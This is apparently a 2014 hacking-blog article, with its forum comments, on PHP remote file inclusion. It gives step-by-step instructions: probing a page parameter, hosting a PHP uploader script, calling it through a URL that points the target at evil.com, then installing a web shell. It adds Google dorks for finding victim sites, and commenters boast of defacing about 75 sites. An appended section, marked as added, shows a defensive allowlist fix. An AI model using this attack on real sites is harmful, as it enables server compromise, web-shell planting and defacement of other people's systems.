Wednesday, April 16, 2014

Include Exploits

Old but very effective technique for gaining access to a web server



In this article I will teach you the basics of Include Exploits. If you understand PHP then this will help, although not much.

When a site uses one page to call all the others around a basic template, it can become subject to exploitation under certain circumstances, namely when the page name taken from the URL is passed to include() without being checked.

e.g. http://www.abc.com/index.php?page=news

To test if it's vulnerable, try changing the page value to abc or any other name that does not exist.

e.g. http://www.abc.com/index.php?page=abc

If it's vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g.
$page = $_GET ['page'] . ".php";
include ($page);

So, what we need now is an uploader to allow us to upload files on to their server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile )
{
@$res=copy($userfile,"$userfile_name");
if ( !$res ){
print "Upload failed! \n";
}else{
print "Upload of $userfile_name successful \n";
}
}
?>

<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>

So, we need to host this code on a server that doesn't support PHP, or just edit your .htaccess so your server treats it as HTML or whatever. A good, simple free host that doesn't support PHP and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember, if the site appends .php to the page variable, be sure to leave the extension off your URL. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, Google. Good searches include:

inurl:"index.php?page=downloads"
inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and I hope you've learnt something new.

Will.
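
The fix for the include pattern the article describes, as an added example that is not part of the original article: the ?page= value is used only as a key into a fixed allowlist, so neither a URL nor an unknown name ever reaches include, and a bad value gets a generic 404 instead of the path-leaking warning. PAGES_DIR, the page names and resolve_page() are assumptions for illustration; in php.ini, allow_url_include = Off (the default since PHP 5.2) and display_errors = Off back this up.

```php
<?php
// Added example: allowlist-based replacement for
//   include($_GET['page'] . ".php");
// PAGES_DIR and the page names below are assumptions for illustration.

const PAGES_DIR = __DIR__ . '/pages';

// Only these logical names can ever be included. The request value is a
// lookup key and never becomes part of a path or URL.
const ALLOWED_PAGES = [
    'news'      => 'news.php',
    'downloads' => 'downloads.php',
    'contact'   => 'contact.php',
];

/**
 * Map the untrusted ?page= value to a file on disk, or null if not allowed.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside PAGES_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'news');
if ($target === null) {
    // Generic 404: no include() warning, so no server path or line number leaks.
    http_response_code(404);
    exit('Page not found');
}
include $target;
```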

Comments

god on March 25 2006 - 20:09:26
nice nice B) I liked it
Pepe on March 25 2006 - 20:30:06
Good article. I always get "upload failed n" though.
willeH on March 25 2006 - 21:00:44
That's because the index.php file you're exploiting doesn't have the permissions, I think. Try making a script using fopen instead.
BluMoose on March 25 2006 - 22:58:01
Great article, nicely explained :)
thousandtoone on March 26 2006 - 05:15:13
What article did you base this off of? I'm not accusing you of anything, just wondering if you had read the article I posted to Rohitab and HTS a while back.
superpimp on March 26 2006 - 11:46:45
awesome article :D
willeH on March 26 2006 - 13:17:56
thousandtoone, I based it on sheer experience. I haven't read your article and apologise if you feel I've copied you. I've never even heard of 'Rohitab' and have only ever been on HTS once. Was your article similar to mine?
thousandtoone on March 26 2006 - 20:20:21
WilleH, figured that was the case. Generally people don't try to reinvent the wheel so I thought you might've read this somewhere in the past. This article I wrote was one of my first major attempts at defacing.. Between this and finding two of my own vulnerabilities in PHP-Nuke, I must've defaced close to 75 websites in one weekend. http://www.hackthissite.org/articles/read/285/2/30
thousandtoone on March 26 2006 - 20:22:25
You talk more about uploads whereas I discuss shell commands and general fopen attacks, but nonetheless you can see where I imagined you might've seen my article. Fun stuff and good article!
the_flash on March 27 2006 - 16:41:17
This is one of the best articles I've come across on this site. Congrats! :)
wolfmankurd on March 27 2006 - 17:17:14
It sounds like an article on HTS but is completely different
superpimp on March 27 2006 - 18:53:41
there is one problem... most websites use it like this:
<?php
$page = $_GET['page'];
$page_include = "include/" . $page;
include($page_include);
?>
basically, this means that if you use this exploit it will include include/http://evil.com/uploader.php instead of http://evil.com/uploader.php, so the file won't be found :(
willeH on March 27 2006 - 21:36:51
Most websites don't.
z3ro on March 27 2006 - 22:54:48
nice article
superpimp on March 28 2006 - 19:33:04
@ willeH: example?
superpimp on March 28 2006 - 20:12:22
Well, I found one. It's not to break down your article, it's very good. Just said not many sites used it like that...
willeH on March 29 2006 - 13:48:31
Exactly, or else no site would be safe.
willeH on March 29 2006 - 13:49:25
And, I'm not going to give you an example because no doubt it would get around and the server would get raped.
SwiftNomad on June 25 2006 - 21:13:00
this was def. worth the read!
netfish on February 02 2007 - 03:50:20
SkareCrow wrote a similar article, for those who still don't get it: http://www.hellbo. . .cle_id=612
sam207 on September 26 2008 - 11:26:31
"inurl:.php?page=" is the good dork to use I think.. It's a nice article, though I don't feel it's awesome.. Very Good I choose..